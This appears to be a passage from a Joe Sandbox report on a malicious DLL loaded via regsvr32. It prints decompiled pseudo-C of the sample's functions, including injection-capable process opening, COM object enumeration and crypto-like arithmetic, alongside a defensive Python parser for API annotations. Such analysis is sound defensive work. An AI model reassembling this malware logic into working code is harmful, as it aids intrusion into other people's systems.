                                				 *0x2bdd26c = _t2;
                                				if(_t2 == 0) {
                                					return GetLastError();
                                				}
                                				_t4 = GetVersion(); // low byte = major, next byte = minor, high word = build
                                				if(_t4 != 5) {
                                					L4:
                                					if(_t15 <= 0) {
                                						_t5 = 0x32; // ERROR_NOT_SUPPORTED
                                						return _t5;
                                					}
                                					L5:
                                					 *0x2bdd25c = _t4;
                                					_t6 = GetCurrentProcessId();
                                					 *0x2bdd258 = _t6;
                                					 *0x2bdd264 = _a4;
                                					_t7 = OpenProcess(0x10047a, 0, _t6); // own PID; rights include VM_WRITE | VM_OPERATION | CREATE_THREAD
                                					 *0x2bdd254 = _t7;
                                					if(_t7 == 0) {
                                						 *0x2bdd254 =  *0x2bdd254 | 0xffffffff; // -1 == GetCurrentProcess() pseudo-handle
                                					}
                                					return 0;
                                				}
                                				if(_t4 >> 8 > 0) {
                                					goto L5;
                                				}
                                				_t15 = _t4 - _t4;
                                				goto L4;
                                			}
                                
                                Instruction addresses for the C-code lines above, in order (0x00000000 = no address): 0x02bd9ec3 0x02bd9ec9 0x02bd9ed0 0x00000000 0x02bd9f2a 0x02bd9ed2 0x02bd9eda 0x02bd9ee7 0x02bd9ee7 0x02bd9f27 0x00000000 0x02bd9f27 0x02bd9ee9 0x02bd9ee9 0x02bd9eee 0x02bd9f00 0x02bd9f05 0x02bd9f0b 0x02bd9f11 0x02bd9f18 0x02bd9f1a 0x02bd9f1a 0x00000000 0x02bd9f21 0x02bd9ee3 0x00000000 0x00000000 0x02bd9ee5 0x00000000

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02BD27C3,?,?,00000001,?,?,?,02BD7F25,?), ref: 02BD9EC3
                                • GetVersion.KERNEL32(?,00000001,?,?,?,02BD7F25,?), ref: 02BD9ED2
                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02BD7F25,?), ref: 02BD9EEE
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02BD7F25,?), ref: 02BD9F0B
                                • GetLastError.KERNEL32(?,00000001,?,?,?,02BD7F25,?), ref: 02BD9F2A
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 3d7d7f595089041fd5cc2c7926fb8b6d9dac86a19bfc973a63b98c159685f26e
                                • Instruction ID: 5cda6db62a99a53c93e65107051aea0e565a5dcf2ebcb431f163cbac5d81abdf
                                • Opcode Fuzzy Hash: 3d7d7f595089041fd5cc2c7926fb8b6d9dac86a19bfc973a63b98c159685f26e
                                • Instruction Fuzzy Hash: DDF08771ED6B03ABD7208B64E929BE53FA2E740785F40491AE5C2C71C0F770E021CB19
                                Uniqueness

                                Uniqueness Score: -1.00%
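An added example (my own code, not part of the Joe Sandbox report or of the sample): a parser for the bullet lines in the APIs lists of these function records, plus a decoder for the 0x10047a access mask that E02BD9EBB passes to OpenProcess. The sample lines are copied from the annotations above (E02BD9EBB's list, one subcall line from E02BD9267's list and the parenthesis-less mbstowcs form from the first record); the ApiCall record layout, the function names and the "injection-capable" heuristic are my own.

```python
"""Parse Joe Sandbox 'APIs' annotation lines and decode OpenProcess access masks.

Added example, not part of the report or of the analysed sample.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the APIs list of E02BD9EBB, one 'Part of subcall' line
# from E02BD9267's list and one annotation without an argument list.
SAMPLE_APIS = """\
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02BD27C3,?,?,00000001,?,?,?,02BD7F25,?), ref: 02BD9EC3
• GetVersion.KERNEL32(?,00000001,?,?,?,02BD7F25,?), ref: 02BD9ED2
• GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02BD7F25,?), ref: 02BD9EEE
• OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02BD7F25,?), ref: 02BD9F0B
  • Part of subcall function 02BD1525: RtlAllocateHeap.NTDLL(00000000,00000000,02BD1278), ref: 02BD1531
• GetLastError.KERNEL32(?,00000001,?,?,?,02BD7F25,?), ref: 02BD9F2A
  • Part of subcall function 02BD7B3B: mbstowcs.NTDLL ref: 02BD7B6B
"""

# One annotation line: optional 'Part of subcall function XXXX:' prefix, then
# Api.MODULE(arg,arg,...), ref: ADDRESS. The arguments are raw stack slots at
# call time (hex DWORDs, or '?' when the sandbox could not read one), so the
# list is usually longer than the API's real parameter count.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None for '?'
    ref: int                    # address of the call instruction
    subcall_of: Optional[int]   # address of the called helper for indirect calls


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the bullet lines into ApiCall records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [None if a == "?" else int(a, 16) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


# PROCESS_* specific rights from winnt.h; SYNCHRONIZE is the standard right.
PROCESS_RIGHTS = [
    (0x0001, "PROCESS_TERMINATE"),
    (0x0002, "PROCESS_CREATE_THREAD"),
    (0x0008, "PROCESS_VM_OPERATION"),
    (0x0010, "PROCESS_VM_READ"),
    (0x0020, "PROCESS_VM_WRITE"),
    (0x0040, "PROCESS_DUP_HANDLE"),
    (0x0080, "PROCESS_CREATE_PROCESS"),
    (0x0100, "PROCESS_SET_QUOTA"),
    (0x0200, "PROCESS_SET_INFORMATION"),
    (0x0400, "PROCESS_QUERY_INFORMATION"),
    (0x0800, "PROCESS_SUSPEND_RESUME"),
    (0x1000, "PROCESS_QUERY_LIMITED_INFORMATION"),
    (0x00100000, "SYNCHRONIZE"),
]

# Heuristic (my own): the three rights needed for classic remote-thread injection.
INJECTION_RIGHTS = 0x0002 | 0x0008 | 0x0020   # CREATE_THREAD | VM_OPERATION | VM_WRITE


def decode_process_access(mask: int) -> List[str]:
    """Name the bits of an OpenProcess desired-access mask; unknown bits are kept as hex."""
    names = [name for bit, name in PROCESS_RIGHTS if mask & bit]
    rest = mask & ~sum(bit for bit, _ in PROCESS_RIGHTS)
    if rest:
        names.append(f"0x{rest:08X}")
    return names


def open_process_calls(calls: List[ApiCall]):
    """Yield (ref, mask, names, injection_capable) for every OpenProcess with a readable mask."""
    for c in calls:
        if c.api == "OpenProcess" and c.args and c.args[0] is not None:
            mask = c.args[0]
            yield c.ref, mask, decode_process_access(mask), (mask & INJECTION_RIGHTS) == INJECTION_RIGHTS


if __name__ == "__main__":
    for ref, mask, names, inj in open_process_calls(parse_api_lines(SAMPLE_APIS)):
        print(f"OpenProcess @ {ref:08X} mask 0x{mask:08X}: {' | '.join(names)}; injection-capable={inj}")
```

Run over E02BD9EBB's list this reports the single OpenProcess at 02BD9F0B with the seven rights named in the function's comment and flags it injection-capable, even though the target here is the sample's own PID; the same walk over a whole report is a quick way to find every OpenProcess whose mask carries VM_WRITE and CREATE_THREAD.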

                                C-Code - Quality: 46%
                                			// COM enumeration through raw vtable slots (32-bit IUnknown layout: slot 0 =
                                			// QueryInterface, +4 = AddRef, +8 = Release). *0x2bdd2a8 (0x242a5a8) is an
                                			// offset added to image addresses, so the IIDs at 0x2bde038 / 0x2bde0bc and the
                                			// wide string at 0x2bde078 are read from a relocated copy of the module's data.
                                			// __imp__#2 / __imp__#6 are the OLEAUT32 ordinals for SysAllocString /
                                			// SysFreeString (see the APIs list below). The function obtains an interface
                                			// from its argument, builds a BSTR from the string at 0x2bdc290, asks slot +0xbc
                                			// for a collection, reads its count (slot +0x24), fetches each item (slot
                                			// +0x2c, with what look like two VT_I4 VARIANTs copied onto the stack by the
                                			// movsd runs), queries a second interface on the item, reads a BSTR name (slot
                                			// +0x34) and, if it equals the string at 0x2bde078, invokes slot +0x114 on that
                                			// item. Returns the last HRESULT.
                                			E02BD4E05(intOrPtr* __eax) {
                                				void* _v8;
                                				WCHAR* _v12;
                                				void* _v16;
                                				char _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				void* _v32;
                                				intOrPtr _v40;
                                				short _v48;
                                				intOrPtr _v56;
                                				short _v64;
                                				intOrPtr* _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t57;
                                				intOrPtr* _t58;
                                				intOrPtr* _t60;
                                				void* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				short _t67;
                                				intOrPtr* _t68;
                                				intOrPtr* _t70;
                                				intOrPtr* _t72;
                                				intOrPtr* _t75;
                                				intOrPtr* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t83;
                                				intOrPtr* _t87;
                                				intOrPtr _t103;
                                				intOrPtr _t109;
                                				void* _t118;
                                				void* _t122;
                                				void* _t123;
                                				intOrPtr _t130;
                                
                                				_t123 = _t122 - 0x3c;
                                				_push( &_v8);
                                				_push(__eax);
                                				_t118 =  *((intOrPtr*)( *__eax + 0x48))(); // slot +0x48 on the argument object -> _v8
                                				if(_t118 >= 0) {
                                					_t54 = _v8;
                                					_t103 =  *0x2bdd2a8; // 0x242a5a8
                                					_t5 = _t103 + 0x2bde038; // 0x3050f485  (first IID, relocated)
                                					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32); // QueryInterface(iid, &_v32)
                                					_t56 = _v8;
                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56); // Release()
                                					if(_t118 >= 0) {
                                						__imp__#2(0x2bdc290); // SysAllocString(wide string at 0x2bdc290)
                                						_v28 = _t57; // the returned BSTR (the decompiler reused _t57 for it)
                                						if(_t57 == 0) {
                                							_t118 = 0x8007000e; // E_OUTOFMEMORY
                                						} else {
                                							_t60 = _v32;
                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24); // slot +0xbc(BSTR, &collection)
                                							_t87 = __imp__#6; // SysFreeString
                                							_t118 = _t61;
                                							if(_t118 >= 0) {
                                								_t63 = _v24;
                                								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20); // slot +0x24: item count -> _v20
                                								if(_t118 >= 0) {
                                									_t130 = _v20;
                                									if(_t130 != 0) {
                                										_t67 = 3; // VT_I4
                                										_v64 = _t67; // VARIANT #1: vt = VT_I4, value = _v56 = 0
                                										_v48 = _t67; // VARIANT #2: vt = VT_I4, value = _v40 = loop index
                                										_v56 = 0;
                                										_v40 = 0;
                                										if(_t130 > 0) {
                                											while(1) {
                                												_t68 = _v24;
                                												asm("movsd"); // copy the two 16-byte VARIANTs onto the stack as arguments
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t123 = _t123;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8); // slot +0x2c(var, var, &item)
                                												if(_t118 < 0) {
                                													goto L16;
                                												}
                                												_t70 = _v8;
                                												_t109 =  *0x2bdd2a8; // 0x242a5a8
                                												_t28 = _t109 + 0x2bde0bc; // 0x3050f1ff  (second IID, relocated)
                                												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16); // item->QueryInterface(iid, &_v16)
                                												if(_t118 >= 0) {
                                													_t75 = _v16;
                                													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12); // slot +0x34: BSTR name -> _v12
                                													if(_t118 >= 0 && _v12 != 0) {
                                														_t79 =  *0x2bdd2a8; // 0x242a5a8
                                														_t33 = _t79 + 0x2bde078; // 0x76006f  (target name, starts L"ov")
                                														if(lstrcmpW(_v12, _t33) == 0) {
                                															_t83 = _v16;
                                															 *((intOrPtr*)( *_t83 + 0x114))(_t83); // name matched: invoke slot +0x114 on this item
                                														}
                                														 *_t87(_v12); // SysFreeString(name)
                                													}
                                													_t77 = _v16;
                                													 *((intOrPtr*)( *_t77 + 8))(_t77); // Release()
                                												}
                                												_t72 = _v8;
                                												 *((intOrPtr*)( *_t72 + 8))(_t72); // Release() the item
                                												_v40 = _v40 + 1;
                                												if(_v40 < _v20) {
                                													continue;
                                												}
                                												goto L16;
                                											}
                                										}
                                									}
                                								}
                                								L16:
                                								_t65 = _v24;
                                								 *((intOrPtr*)( *_t65 + 8))(_t65); // Release() the collection
                                							}
                                							 *_t87(_v28); // SysFreeString(BSTR from 0x2bdc290)
                                						}
                                						_t58 = _v32;
                                						 *((intOrPtr*)( *_t58 + 8))(_t58); // Release()
                                					}
                                				}
                                				return _t118;
                                			}
                                
                                Instruction addresses for the C-code lines above, in order (0x00000000 = no address): 0x02bd4e0a 0x02bd4e13 0x02bd4e14 0x02bd4e18 0x02bd4e1e 0x02bd4e24 0x02bd4e2d 0x02bd4e33 0x02bd4e3d 0x02bd4e3f 0x02bd4e45 0x02bd4e4a 0x02bd4e55 0x02bd4e5b 0x02bd4e60 0x02bd4f82 0x02bd4e66 0x02bd4e66 0x02bd4e73 0x02bd4e79 0x02bd4e7f 0x02bd4e83 0x02bd4e89 0x02bd4e96 0x02bd4e9a 0x02bd4ea0 0x02bd4ea3 0x02bd4eab 0x02bd4eac 0x02bd4eb0 0x02bd4eb4 0x02bd4eb7 0x02bd4eba 0x02bd4ec0 0x02bd4ec9 0x02bd4ecf 0x02bd4ed0 0x02bd4ed3 0x02bd4ed4 0x02bd4ed5 0x02bd4edd 0x02bd4ede 0x02bd4edf 0x02bd4ee1 0x02bd4ee5 0x02bd4ee9 0x00000000 0x00000000 0x02bd4eef 0x02bd4ef8 0x02bd4efe 0x02bd4f08 0x02bd4f0c 0x02bd4f0e 0x02bd4f1b 0x02bd4f1f 0x02bd4f27 0x02bd4f2c 0x02bd4f3e 0x02bd4f40 0x02bd4f46 0x02bd4f46 0x02bd4f4f 0x02bd4f4f 0x02bd4f51 0x02bd4f57 0x02bd4f57 0x02bd4f5a 0x02bd4f60 0x02bd4f63 0x02bd4f6c 0x00000000 0x00000000 0x00000000 0x02bd4f6c 0x02bd4ec0 0x02bd4eba 0x02bd4ea3 0x02bd4f72 0x02bd4f72 0x02bd4f78 0x02bd4f78 0x02bd4f7e 0x02bd4f7e 0x02bd4f87 0x02bd4f8d 0x02bd4f8d 0x02bd4e4a 0x02bd4f96

                                APIs
                                • SysAllocString.OLEAUT32(02BDC290), ref: 02BD4E55
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02BD4F36
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD4F4F
                                • SysFreeString.OLEAUT32(?), ref: 02BD4F7E
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 4f1054490bdfebadf94121581230cc54e5769801f50b67327fa76f0c02ade7bb
                                • Instruction ID: 136954fe1f08753307030573886623a336b8637d075099e0d71f17c120806c39
                                • Opcode Fuzzy Hash: 4f1054490bdfebadf94121581230cc54e5769801f50b67327fa76f0c02ade7bb
                                • Instruction Fuzzy Hash: CF512F75D00519EFCB00DFA8C4889EEF7BAFF89705B154595E919EB220E731AD41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 02BD13B6
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD149B
                                  • Part of subcall function 02BD4E05: SysAllocString.OLEAUT32(02BDC290), ref: 02BD4E55
                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 02BD14EE
                                • SysFreeString.OLEAUT32(00000000), ref: 02BD14FD
                                  • Part of subcall function 02BD52B9: Sleep.KERNEL32(000001F4), ref: 02BD5301
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: b5d0581617fa0a040cc0bf8c2016281146b01c6ae05add121f51b71ceb0af6f2
                                • Instruction ID: f3f71a735c5edf1517c00f3936a24790d15303ea40b5cff4e53307fdfff18fca
                                • Opcode Fuzzy Hash: b5d0581617fa0a040cc0bf8c2016281146b01c6ae05add121f51b71ceb0af6f2
                                • Instruction Fuzzy Hash: 3D515136900609AFDB11CFA8C844BDEB7B6FF88744B198869E909DB210EB71ED05CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E02BD29ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				void _v92;
                                				void _v236;
                                				void* _t55;
                                				unsigned int _t56;
                                				signed int _t66;
                                				signed int _t74;
                                				void* _t76;
                                				signed int _t79;
                                				void* _t81;
                                				void* _t92;
                                				void* _t96;
                                				signed int* _t99;
                                				signed int _t101;
                                				signed int _t103;
                                				void* _t107;
                                
                                				_t92 = _a12;
                                				_t101 = __eax;
                                				_t55 = E02BD8B37(_a16, _t92);
                                				_t79 = _t55;
                                				if(_t79 == 0) {
                                					L18:
                                					return _t55;
                                				}
                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                				_t81 = 0;
                                				_t96 = 0x20;
                                				if(_t56 == 0) {
                                					L4:
                                					_t97 = _t96 - _t81;
                                					_v12 = _t96 - _t81;
                                					E02BD4AA4(_t79,  &_v236);
                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02BD2F01(_t101,  &_v236, _a8, _t96 - _t81);
                                					E02BD2F01(_t79,  &_v92, _a12, _t97);
                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                					_t66 = E02BD4AA4(_t101, 0x2bdd1b0);
                                					_t103 = _t101 - _t79;
                                					_a8 = _t103;
                                					if(_t103 < 0) {
                                						L17:
                                						E02BD4AA4(_a16, _a4);
                                						E02BD28BA(_t79,  &_v236, _a4, _t97);
                                						memset( &_v236, 0, 0x8c);
                                						_t55 = memset( &_v92, 0, 0x44);
                                						goto L18;
                                					}
                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                					do {
                                						if(_v8 != 0xffffffff) {
                                							_push(1);
                                							_push(0);
                                							_push(0);
                                							_push( *_t99);
                                							L02BDAF6E();
                                							_t74 = _t66 +  *(_t99 - 4);
                                							asm("adc edx, esi");
                                							_push(0);
                                							_push(_v8 + 1);
                                							_push(_t92);
                                							_push(_t74);
                                							L02BDAF68();
                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                								_t74 = _t74 | 0xffffffff;
                                								_v16 = _v16 & 0x00000000;
                                							}
                                						} else {
                                							_t74 =  *_t99;
                                						}
                                						_t106 = _t107 + _a8 * 4 - 0xe8;
                                						_a12 = _t74;
                                						_t76 = E02BD9947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                						while(1) {
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							L13:
                                							_t92 =  &_v92;
                                							if(E02BD4506(_t79, _t92, _t106) < 0) {
                                								break;
                                							}
                                							L14:
                                							_a12 = _a12 + 1;
                                							_t76 = E02BDA708(_t79,  &_v92, _t106, _t106);
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							goto L13;
                                						}
                                						_a8 = _a8 - 1;
                                						_t66 = _a12;
                                						_t99 = _t99 - 4;
                                						 *(0x2bdd1b0 + _a8 * 4) = _t66;
                                					} while (_a8 >= 0);
                                					_t97 = _v12;
                                					goto L17;
                                				}
                                				while(_t81 < _t96) {
                                					_t81 = _t81 + 1;
                                					_t56 = _t56 >> 1;
                                					if(_t56 != 0) {
                                						continue;
                                					}
                                					goto L4;
                                				}
                                				goto L4;
                                			}

                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 02BD2A9A
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02BD2AB0
                                • memset.NTDLL ref: 02BD2B50
                                • memset.NTDLL ref: 02BD2B60
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: 690beb1f2ae0e6ed00e808ae2797449b466d0e0bc1da0a18198c49e84d3fcfd5
                                • Instruction ID: 5f33ca7fdd2f3d44fb2f78e709e9c4d5e50566e7d90fe024ac01934b481880ce
                                • Opcode Fuzzy Hash: 690beb1f2ae0e6ed00e808ae2797449b466d0e0bc1da0a18198c49e84d3fcfd5
                                • Instruction Fuzzy Hash: 56418172A00249ABDB20DFA8CC80BDE7776EF45710F0085A9FD19AB181FB709945CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E02BD6150(signed int _a4, signed int* _a8) {
                                				void* __ecx;
                                				void* __edi;
                                				signed int _t6;
                                				intOrPtr _t8;
                                				intOrPtr _t12;
                                				short* _t19;
                                				void* _t25;
                                				signed int* _t28;
                                				CHAR* _t30;
                                				long _t31;
                                				intOrPtr* _t32;
                                
                                				_t6 =  *0x2bdd270; // 0xd448b889
                                				_t32 = _a4;
                                				_a4 = _t6 ^ 0x109a6410;
                                				_t8 =  *0x2bdd2a8; // 0x242a5a8
                                				_t3 = _t8 + 0x2bde87e; // 0x61636f4c
                                				_t25 = 0;
                                				_t30 = E02BD10B1(_t3, 1);
                                				if(_t30 != 0) {
                                					_t25 = CreateEventA(0x2bdd2ac, 1, 0, _t30);
                                					E02BD8B22(_t30);
                                				}
                                				_t12 =  *0x2bdd25c; // 0x4000000a
                                				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02BD8F1B() != 0) {
                                					L12:
                                					_t28 = _a8;
                                					if(_t28 != 0) {
                                						 *_t28 =  *_t28 | 0x00000001;
                                					}
                                					_t31 = E02BD3485(_t32, 0);
                                					if(_t31 == 0 && _t25 != 0) {
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                					}
                                					if(_t28 != 0 && _t31 != 0) {
                                						 *_t28 =  *_t28 & 0xfffffffe;
                                					}
                                					goto L20;
                                				} else {
                                					_t19 =  *0x2bdd10c( *_t32, 0x20);
                                					if(_t19 != 0) {
                                						 *_t19 = 0;
                                						_t19 = _t19 + 2;
                                					}
                                					_t31 = E02BD8B7B(0,  *_t32, _t19, 0);
                                					if(_t31 == 0) {
                                						if(_t25 == 0) {
                                							L22:
                                							return _t31;
                                						}
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                						if(_t31 == 0) {
                                							L20:
                                							if(_t25 != 0) {
                                								CloseHandle(_t25);
                                							}
                                							goto L22;
                                						}
                                					}
                                					goto L12;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 02BD10B1: lstrlen.KERNEL32(00000005,00000000,69B25F44,00000027,00000000,05009D18,00000000,?,?,69B25F44,00000005,02BDD00C,?,?,02BD30FE), ref: 02BD10E7
                                  • Part of subcall function 02BD10B1: lstrcpy.KERNEL32(00000000,00000000), ref: 02BD110B
                                  • Part of subcall function 02BD10B1: lstrcat.KERNEL32(00000000,00000000), ref: 02BD1113
                                • CreateEventA.KERNEL32(02BDD2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02BD991F,?,00000001,?), ref: 02BD6191
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,02BD991F,00000000,00000000,?,00000000,?,02BD991F,?,00000001,?,?,?,?,02BD7D37), ref: 02BD61F1
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,02BD991F,?,00000001,?), ref: 02BD621F
                                • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,02BD991F,?,00000001,?,?,?,?,02BD7D37), ref: 02BD6237
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: defec4b652b592f38240f021f7544f96df8f4924d3e830c9efc28b71ef2aaa51
                                • Instruction ID: 9548e548039a2109efdbe4b3f737c1a9a3d24b5f0dea941a6c663efe08fc0120
                                • Opcode Fuzzy Hash: defec4b652b592f38240f021f7544f96df8f4924d3e830c9efc28b71ef2aaa51
                                • Instruction Fuzzy Hash: 04213733D427125BC7315E68AC44BEBB7ADEF88B55B050AA9F985D7141FB31CC458B40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 40%
                                			E02BD9870(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                				intOrPtr _v12;
                                				void* _v16;
                                				void* _v28;
                                				char _v32;
                                				void* __esi;
                                				void* _t29;
                                				void* _t38;
                                				signed int* _t39;
                                				void* _t40;
                                
                                				_t36 = __ecx;
                                				_v32 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v12 = _a4;
                                				_t38 = E02BD2931(__ecx,  &_v32);
                                				if(_t38 != 0) {
                                					L12:
                                					_t39 = _a8;
                                					L13:
                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                						_t16 =  &(_t39[1]); // 0x5
                                						_t23 = _t16;
                                						if( *_t16 != 0) {
                                							E02BD8DAB(_t23);
                                						}
                                					}
                                					return _t38;
                                				}
                                				if(E02BD155A(0x40,  &_v16) != 0) {
                                					_v16 = 0;
                                				}
                                				_t40 = CreateEventA(0x2bdd2ac, 1, 0,  *0x2bdd344);
                                				if(_t40 != 0) {
                                					SetEvent(_t40);
                                					Sleep(0xbb8);
                                					CloseHandle(_t40);
                                				}
                                				_push( &_v32);
                                				if(_a12 == 0) {
                                					_t29 = E02BD5BC0(_t36);
                                				} else {
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_push(0);
                                					_t29 = E02BD4B2A(_t36);
                                				}
                                				_t41 = _v16;
                                				_t38 = _t29;
                                				if(_v16 != 0) {
                                					E02BD4FF0(_t41);
                                				}
                                				if(_t38 != 0) {
                                					goto L12;
                                				} else {
                                					_t39 = _a8;
                                					_t38 = E02BD6150( &_v32, _t39);
                                					goto L13;
                                				}
                                			}

                                APIs
